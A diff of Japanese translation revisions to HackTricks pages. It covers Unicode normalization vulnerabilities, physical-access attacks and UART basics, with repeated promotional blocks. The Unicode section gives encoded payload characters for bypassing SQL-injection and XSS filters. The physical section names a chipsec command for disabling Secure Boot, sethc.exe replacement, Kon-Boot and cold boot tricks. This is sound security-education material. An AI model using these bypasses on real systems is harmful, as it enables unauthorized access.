* `applicationScope` - グローバルなアプリケーション変数
|
||||
* `applicationScope` - グローバルアプリケーション変数
|
||||
* `requestScope` - リクエスト変数
|
||||
* `initParam` - アプリケーションの初期化変数
|
||||
* `initParam` - アプリケーション初期化変数
|
||||
* `sessionScope` - セッション変数
|
||||
* `param.X` - X が HTTP パラメータの名前である場合のパラメータ値
|
||||
|
||||
|
@ -240,11 +240,11 @@ ${employee.FirstName}
|
|||
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools)
|
||||
* [https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt](https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックする**無料**の機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
|
||||
|
@ -254,12 +254,12 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>htARTE(HackTricks AWS Red Team Expert)でAWSハッキングをゼロからヒーローまで学ぶ</strong></summary>
|
||||
<summary><strong>ゼロからヒーローまでのAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセス**したいですか?または、**HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセス**したいですか?または、HackTricksを**PDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つけてください
|
||||
* [**公式PEASS&HackTricks swag**](https://peass.creator-spring.com)を手に入れましょう
|
||||
* **💬** [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
|
||||
* **ハッキングトリックを共有するために、**[**hacktricksリポジトリ**](https://github.com/carlospolop/hacktricks) **と** [**hacktricks-cloudリポジトリ**](https://github.com/carlospolop/hacktricks-cloud) **にPRを提出**してください。
|
||||
* [**公式PEASS&HackTricksスウォッグ**](https://peass.creator-spring.com)を手に入れましょう
|
||||
* **💬** [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)を**フォロー**してください。
|
||||
* **ハッキングトリックを共有するために**[**hacktricksリポジトリ**](https://github.com/carlospolop/hacktricks) **と**[**hacktricks-cloudリポジトリ**](https://github.com/carlospolop/hacktricks-cloud) **にPRを提出**してください。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,21 +2,21 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>htARTE(HackTricks AWS Red Team Expert)</strong>を通じて、ゼロからヒーローまでAWSハッキングを学びましょう!</summary>
|
||||
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- **HackTricksで企業を宣伝したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
- [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を入手する
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
|
||||
- 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)で**フォロー**する
|
||||
- **ハッキングテクニックを共有するために、**[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出する
|
||||
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)コレクションを見つける
|
||||
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦で**フォロー**する [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
|
||||
* **ハッキングテクニックを共有するには、**[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
|
||||
|
@ -28,28 +28,28 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
---
|
||||
|
||||
**これは、**[**https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/**](https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/) **の要約です。詳細についてはそちらをご覧ください(そこからの画像を取得)。
|
||||
**これは、**[**https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/**](https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/) **の要約です。詳細についてはそちらをご覧ください(そこから画像を取得しました)。
|
||||
|
||||
## Unicodeと正規化の理解
|
||||
|
||||
Unicode正規化は、異なる文字のバイナリ表現が同じバイナリ値に標準化されるプロセスです。このプロセスは、プログラミングやデータ処理において文字列を扱う際に重要です。Unicode標準は、2種類の文字の同等性を定義しています:
|
||||
|
||||
1. **正準同等性**:文字は、印刷または表示されたときに同じ外観と意味を持つ場合、正準的に等価と見なされます。
|
||||
2. **互換性同等性**:より弱い同等性の形式で、文字は同じ抽象的な文字を表すかもしれませんが、異なる表示方法で表示されることがあります。
|
||||
1. **正準同等性**:文字が印刷されたり表示されたりしたときに同じ外観と意味を持つ場合、正準的に等価と見なされます。
|
||||
2. **互換性同等性**:より弱い同等性の形式で、文字が同じ抽象文字を表すことができますが、異なる表示方法ができます。
|
||||
|
||||
**4つのUnicode正規化アルゴリズム**があります:NFC、NFD、NFKC、NFKD。各アルゴリズムは、正準および互換性の正規化技術を異なる方法で使用します。詳細については、[Unicode.org](https://unicode.org/)でこれらの技術を探索できます。
|
||||
**4つのUnicode正規化アルゴリズム**があります:NFC、NFD、NFKC、NFKD。各アルゴリズムは正準化と互換性正規化の技術を異なる方法で使用します。詳細については、[Unicode.org](https://unicode.org/)でこれらの技術を探索できます。
|
||||
|
||||
### Unicodeエンコーディングの要点
|
||||
|
||||
Unicodeエンコーディングの理解は、異なるシステムや言語間の相互運用性の問題を扱う際に特に重要です。主なポイントは次のとおりです:
|
||||
|
||||
- **コードポイントと文字**:Unicodeでは、各文字や記号に「コードポイント」として知られる数値が割り当てられます。
|
||||
- **バイト表現**:コードポイント(または文字)は、メモリ内の1バイト以上で表されます。たとえば、英語圏で一般的なLATIN-1文字は1バイトを使用して表されます。ただし、より多くの文字を持つ言語では、表現に複数のバイトが必要です。
|
||||
- **エンコーディング**:この用語は、文字がバイトのシリーズに変換される方法を指します。UTF-8は、ASCII文字が1バイトで表され、他の文字には最大4バイトが使用される一般的なエンコーディング規格です。
|
||||
- **データ処理**:データを処理するシステムは、バイトストリームを文字に正しく変換するために使用されるエンコーディングを正確に把握している必要があります。
|
||||
- **UTFのバリエーション**:UTF-8以外にも、UTF-16(最低2バイト、最大4バイト)、UTF-32(すべての文字に4バイトを使用)など、他のエンコーディング規格があります。
|
||||
* **コードポイントと文字**:Unicodeでは、各文字や記号に「コードポイント」として知られる数値が割り当てられます。
|
||||
* **バイト表現**:コードポイント(または文字)は、メモリ内で1バイト以上のバイトで表されます。たとえば、英語圏で一般的なLATIN-1文字は1バイトで表されます。ただし、より多くの文字を持つ言語では、表現に複数のバイトが必要です。
|
||||
* **エンコーディング**:この用語は、文字がバイトのシリーズに変換される方法を指します。UTF-8は、ASCII文字が1バイトで表され、他の文字には最大4バイトが使用される一般的なエンコーディング規格です。
|
||||
* **データ処理**:データを処理するシステムは、バイトストリームを文字に正しく変換するために使用されるエンコーディングを正確に把握している必要があります。
|
||||
* **UTFのバリアント**:UTF-8以外にも、UTF-16(最低2バイト、最大4バイト)、UTF-32(すべての文字に4バイト使用)などのエンコーディング規格があります。
|
||||
|
||||
これらの概念を理解することは、Unicodeの複雑さとそのさまざまなエンコーディング方法から生じる潜在的な問題を効果的に処理し、緩和するために重要です。
|
||||
これらの概念を理解することは、Unicodeの複雑さとさまざまなエンコーディング方法から生じる潜在的な問題を効果的に処理し、緩和するために重要です。
|
||||
|
||||
Unicodeが同じ文字を表す異なるバイトを正規化する例:
|
||||
```python
|
||||
|
@ -59,17 +59,17 @@ unicodedata.normalize("NFKD","chloe\u0301") == unicodedata.normalize("NFKD", "ch
|
|||
|
||||
### 発見
|
||||
|
||||
Webアプリ内でエコーバックされている値を見つけることができれば、**'KELVIN SIGN' (U+0212A)** を送信してみることができます。これは **"K" に正規化**されます(`%e2%84%aa` として送信できます)。**"K" がエコーバック**された場合、**何らかのUnicode正規化**が行われています。
|
||||
Webアプリ内でエコーバックされている値を見つけることができれば、**'KELVIN SIGN' (U+0212A)** を送信してみることができます。これは **"K"に正規化されます** ( `%e2%84%aa` として送信できます)。**"K" がエコーバック** された場合、**何らかのUnicode正規化** が行われています。
|
||||
|
||||
他の**例**: `%F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83%E2%85%88%F0%9D%94%B0%F0%9D%94%A5%F0%9D%99%96%F0%9D%93%83` を **Unicode** 後に `Leonishan` に正規化します。
|
||||
他の **例**: `%F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83%E2%85%88%F0%9D%94%B0%F0%9D%94%A5%F0%9D%99%96%F0%9D%93%83` を **Unicode** 後に `Leonishan` になります。
|
||||
|
||||
## **脆弱性の例**
|
||||
|
||||
### **SQLインジェクションフィルター回避**
|
||||
|
||||
ユーザー入力を使用してSQLクエリを作成するために文字 `'` を使用しているWebページを想像してください。このWebは、セキュリティ対策として、ユーザー入力から文字 **`'`** のすべての出現を**削除**しますが、その削除後、クエリの作成の前に、ユーザーの入力を**Unicode**を使用して**正規化**します。
|
||||
ユーザー入力を使用してSQLクエリを作成するために文字 `'` を使用しているWebページを想像してください。このWebは、セキュリティ対策として、ユーザー入力から文字 **`'`** のすべての出現を **削除** しますが、その削除後、およびクエリの作成 **前に** ユーザーの入力を **Unicode** を使用して **正規化** します。
|
||||
|
||||
その後、悪意のあるユーザーは、`' (0x27)` に相当する異なるUnicode文字を挿入することができます。例えば `%ef%bc%87` を挿入すると、入力が正規化されると、シングルクォートが作成され、**SQLインジェクションの脆弱性**が発生します。
|
||||
その後、悪意のあるユーザーは、`' (0x27)` に相当する異なるUnicode文字を挿入することができます。例えば `%ef%bc%87` を挿入すると、入力が正規化されると、シングルクォートが作成され、**SQLインジェクションの脆弱性** が発生します:
|
||||
|
||||
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (699).png>)
|
||||
|
||||
|
@ -105,19 +105,19 @@ Webアプリ内でエコーバックされている値を見つけることが
|
|||
|
||||
### XSS(クロスサイトスクリプティング)
|
||||
|
||||
Webアプリをだますために、以下の文字のいずれかを使用してXSSを悪用することができます:
|
||||
Webアプリをだますために、次の文字のいずれかを使用してXSSを悪用することができます:
|
||||
|
||||
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (312) (2).png>)
|
||||
|
||||
たとえば、最初の提案されたUnicode文字は、`%e2%89%ae`または`%u226e`として送信できることに注意してください。
|
||||
たとえば、最初の提案されたUnicode文字は、`%e2%89%ae`または`%u226e`として送信できます。
|
||||
|
||||
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (215) (1) (1).png>)
|
||||
|
||||
### ファジング正規表現
|
||||
|
||||
バックエンドが**正規表現でユーザー入力をチェック**している場合、**入力**が**正規化**されている可能性がありますが、**使用されている**場所では**正規化されていない**かもしれません。たとえば、オープンリダイレクトやSSRFでは、正規表現が送信されたURLを**正規化**してから**そのままアクセス**するかもしれません。
|
||||
バックエンドが**正規表現でユーザー入力をチェック**している場合、**入力**が**正規化**されている可能性がありますが、**使用されている**場所では**正規化されていない**かもしれません。たとえば、Open RedirectやSSRFでは、正規表現が送信されたURLを**正規化**してから**そのままアクセス**するかもしれません。
|
||||
|
||||
ツール[**recollapse**](https://github.com/0xacb/recollapse)は、バックエンドをファジングするための入力の変化を生成することができます。詳細については、**github**とこの[**記事**](https://0xacb.com/2022/11/21/recollapse/)をチェックしてください。
|
||||
ツール[**recollapse**](https://github.com/0xacb/recollapse)は、バックエンドをファジングするために入力の変化を生成することができます。詳細については、**github**とこの[**記事**](https://0xacb.com/2022/11/21/recollapse/)をチェックしてください。
|
||||
|
||||
## 参考文献
|
||||
|
||||
|
@ -125,15 +125,15 @@ Webアプリをだますために、以下の文字のいずれかを使用し
|
|||
* [**https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work**](https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work)
|
||||
* [**https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html**](https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗聴マルウェア**によって**侵害**されていないかをチェックする無料の機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗聴マルウェア**によって**侵害**されていないかをチェックするための**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
|
||||
|
||||
彼らのウェブサイトをチェックし、無料でエンジンを試すことができます:
|
||||
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -146,7 +146,7 @@ HackTricksをサポートする他の方法:
|
|||
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksスウォッグ**](https://peass.creator-spring.com)を手に入れる
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つける
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
|
||||
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
|
||||
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
|
||||
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -9,16 +9,16 @@ HackTricksをサポートする他の方法:
|
|||
- **HackTricksで企業を宣伝**したい場合や**HackTricksをPDFでダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
- [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を入手する
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
|
||||
- **Discordグループ**に参加する💬(https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**🐦で私たちをフォローする[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
||||
- **Discordグループ**に参加する💬(https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**🐦で私たちをフォローする[**@carlospolopm**](https://twitter.com/hacktricks_live)。
|
||||
- **HackTricks**(https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有してください。
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、**盗難マルウェア**による企業や顧客の**侵害**をチェックするための**無料**機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックする**無料**の機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
|
||||
|
@ -34,27 +34,27 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
ハードウェアの調整が不可能または実用的でない場合、**ソフトウェアツール**が解決策を提供します。**Kali Linux**などのディストリビューションを使用して**Live CD/USB**からシステムを実行すると、**_killCmos_**や**_CmosPWD_**などのツールにアクセスでき、BIOSパスワードの回復に役立ちます。
|
||||
|
||||
BIOSパスワードが不明な場合、それを**3回間違えて**入力すると通常エラーコードが表示されます。このコードは、[https://bios-pw.org](https://bios-pw.org)のようなウェブサイトで使用して、使用可能なパスワードを取得する可能性があります。
|
||||
BIOSパスワードが不明な場合、それを**3回間違えて**入力すると通常、エラーコードが表示されます。このコードは、[https://bios-pw.org](https://bios-pw.org)のようなウェブサイトで使用して、使用可能なパスワードを取得する可能性があります。
|
||||
|
||||
### UEFIセキュリティ
|
||||
|
||||
従来のBIOSの代わりに**UEFI**を使用する現代のシステムでは、**chipsec**ツールを使用して、**Secure Boot**の無効化を含むUEFI設定の分析と変更が可能です。次のコマンドでこれを実行できます:
|
||||
従来のBIOSの代わりに**UEFI**を使用している現代のシステムでは、**chipsec**ツールを使用して、**Secure Boot**の無効化を含むUEFI設定の分析と変更が可能です。次のコマンドを使用してこれを実行できます:
|
||||
|
||||
`python chipsec_main.py -module exploits.secure.boot.pk`
|
||||
|
||||
### RAM分析とCold Boot攻撃
|
||||
|
||||
RAMは、通常**1〜2分間**の間、電源が切断された後もデータを一時的に保持します。この持続性は、液体窒素などの冷却物質を適用することで**10分間**延長できます。この拡張された期間中、**dd.exe**や**volatility**などのツールを使用して**メモリダンプ**を作成し、分析することができます。
|
||||
RAMは、通常**1〜2分**の間、電源が切断された後もデータを一時的に保持します。この持続性は、液体窒素などの冷却物質を適用することで**10分間**延長することができます。この拡張された期間中、**dd.exe**や**volatility**などのツールを使用して**メモリダンプ**を作成し、分析することができます。
|
||||
|
||||
### 直接メモリアクセス(DMA)攻撃
|
||||
|
||||
**INCEPTION**は、**FireWire**や**Thunderbolt**などのインターフェースと互換性があり、DMAを介した**物理メモリ操作**のために設計されたツールです。これにより、メモリをパッチして任意のパスワードを受け入れることで、ログイン手順をバイパスできます。ただし、**Windows 10**システムには効果がありません。
|
||||
**INCEPTION**は、**FireWire**や**Thunderbolt**などのインターフェースと互換性があり、DMAを介した**物理メモリ操作**のためのツールです。これにより、メモリをパッチして任意のパスワードを受け入れることで、ログイン手順をバイパスすることができます。ただし、**Windows 10**システムに対しては効果がありません。
|
||||
|
||||
### システムアクセスのためのLive CD/USB
|
||||
|
||||
**_sethc.exe_**や**_Utilman.exe_**などのシステムバイナリを**_cmd.exe_**のコピーで変更すると、システム特権を持つコマンドプロンプトを提供できます。**chntpw**などのツールを使用して、Windowsインストールの**SAM**ファイルを編集してパスワードを変更できます。
|
||||
**_sethc.exe_**や**_Utilman.exe_**などのシステムバイナリを**_cmd.exe_**のコピーで変更することで、システム特権を持つコマンドプロンプトを提供できます。**chntpw**などのツールを使用して、Windowsインストールの**SAM**ファイルを編集してパスワードを変更できます。
|
||||
|
||||
**Kon-Boot**は、Windowsシステムにログインするのを容易にするツールで、WindowsカーネルやUEFIを一時的に変更します。詳細は[https://www.raymond.cc](https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/)で確認できます。
|
||||
**Kon-Boot**は、Windowsシステムにログインするのを容易にするツールで、WindowsカーネルやUEFIを一時的に変更することでパスワードを知らずにログインできます。詳細は[https://www.raymond.cc](https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/)で確認できます。
|
||||
|
||||
### Windowsセキュリティ機能の取り扱い
|
||||
|
||||
|
@ -66,11 +66,11 @@ RAMは、通常**1〜2分間**の間、電源が切断された後もデータ
|
|||
|
||||
#### BAD USBデバイス
|
||||
|
||||
**Rubber Ducky**や**Teensyduino**などのデバイスは、悪意のあるUSBデバイスを作成するプラットフォームとして機能し、ターゲットコンピュータに接続されたときに事前定義されたペイロードを実行できます。
|
||||
**Rubber Ducky**や**Teensyduino**などのデバイスは、悪意のあるUSBデバイスを作成するプラットフォームとして機能し、ターゲットコンピュータに接続されると事前定義されたペイロードを実行できます。
|
||||
|
||||
#### ボリュームシャドウコピー
|
||||
|
||||
管理者特権を使用すると、PowerShellを介して**SAM**ファイルなどの機密ファイルのコピーを作成できます。
|
||||
管理者権限を使用すると、PowerShellを介して**SAM**ファイルなどの機密ファイルのコピーを作成できます。
|
||||
|
||||
### BitLocker暗号のバイパス
|
||||
|
||||
|
@ -78,4 +78,4 @@ BitLocker暗号は、メモリダンプファイル(**MEMORY.DMP**)内で**
|
|||
|
||||
### リカバリキーの追加のためのソーシャルエンジニアリング
|
||||
|
||||
新しいBitLockerリカバリキーは、ユーザーに新しいリカバリキーを追加するコマンドを実行させることで追加でき、これにより復号化プロセスが簡素化されます。
|
||||
ソーシャルエンジニアリングの戦術を使用して、ユーザーに新しいBitLockerリカバリキーを追加するよう説得し、ゼロから構成された新しいリカバリキーを追加するコマンドを実行させることで、復号化プロセスを簡素化できます。
|
||||
|
|
|
@ -8,19 +8,19 @@ HackTricksをサポートする他の方法:
|
|||
|
||||
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
- [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を入手する
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
|
||||
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で**@carlospolopm**をフォローする🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
|
||||
- **ハッキングトリックを共有するには、**[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)コレクションを見つける
|
||||
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**をフォロー**する
|
||||
- **ハッキングトリックを共有するには、PRを** [**HackTricks**](https://github.com/carlospolop/hacktricks) **と** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **のGitHubリポジトリに提出してください。**
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スチーラーマルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗聴マルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
|
||||
|
||||
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
|
||||
|
||||
|
@ -30,11 +30,11 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
## 基本情報
|
||||
|
||||
UARTはシリアルプロトコルであり、コンポーネント間でデータを1ビットずつ転送します。一方、パラレル通信プロトコルは複数のチャネルを通じてデータを同時に送信します。一般的なシリアルプロトコルには、RS-232、I2C、SPI、CAN、Ethernet、HDMI、PCI Express、およびUSBが含まれます。
|
||||
UARTはシリアルプロトコルであり、コンポーネント間でデータを1ビットずつ転送します。一方、並列通信プロトコルは複数のチャネルを通じてデータを同時に送信します。一般的なシリアルプロトコルには、RS-232、I2C、SPI、CAN、Ethernet、HDMI、PCI Express、USBなどがあります。
|
||||
|
||||
一般的に、UARTがアイドル状態にあるときは、ラインが高い(論理1の値)に保持されます。次に、送信機が受信機にデータ転送の開始を示すために、開始ビットを送信します。この間、信号は低い(論理0の値)に保持されます。次に、送信機は、実際のメッセージを含む5〜8ビットのデータビットを送信し、オプションのパリティビットと、構成に応じて1または2つのストップビット(論理1の値)が続きます。エラーチェックに使用されるパリティビットは、実際にはほとんど見られません。ストップビット(またはビット)は、送信の終わりを示します。
|
||||
一般的に、UARTがアイドル状態にあるときは、ラインは高い(論理1の値)に保持されます。次に、データ転送の開始を示すために、送信機が受信機にスタートビットを送信します。この間、信号は低い(論理0の値)に保持されます。次に、送信機は、実際のメッセージを含む5〜8ビットのデータビットを送信し、オプションのパリティビットと1または2つのストップビット(論理1の値)が続きます。エラーチェックに使用されるパリティビットは、実際にはほとんど見られません。ストップビット(またはビット)は、送信の終了を示します。
|
||||
|
||||
最も一般的な構成を8N1と呼びます:8ビットのデータ、パリティなし、1ビットのストップビット。たとえば、ASCIIで文字C、または0x43を送信したい場合、8N1 UART構成で次のビットを送信します:0(開始ビット);0、1、0、0、0、0、1、1(バイナリで0x43の値)、および0(ストップビット)。
|
||||
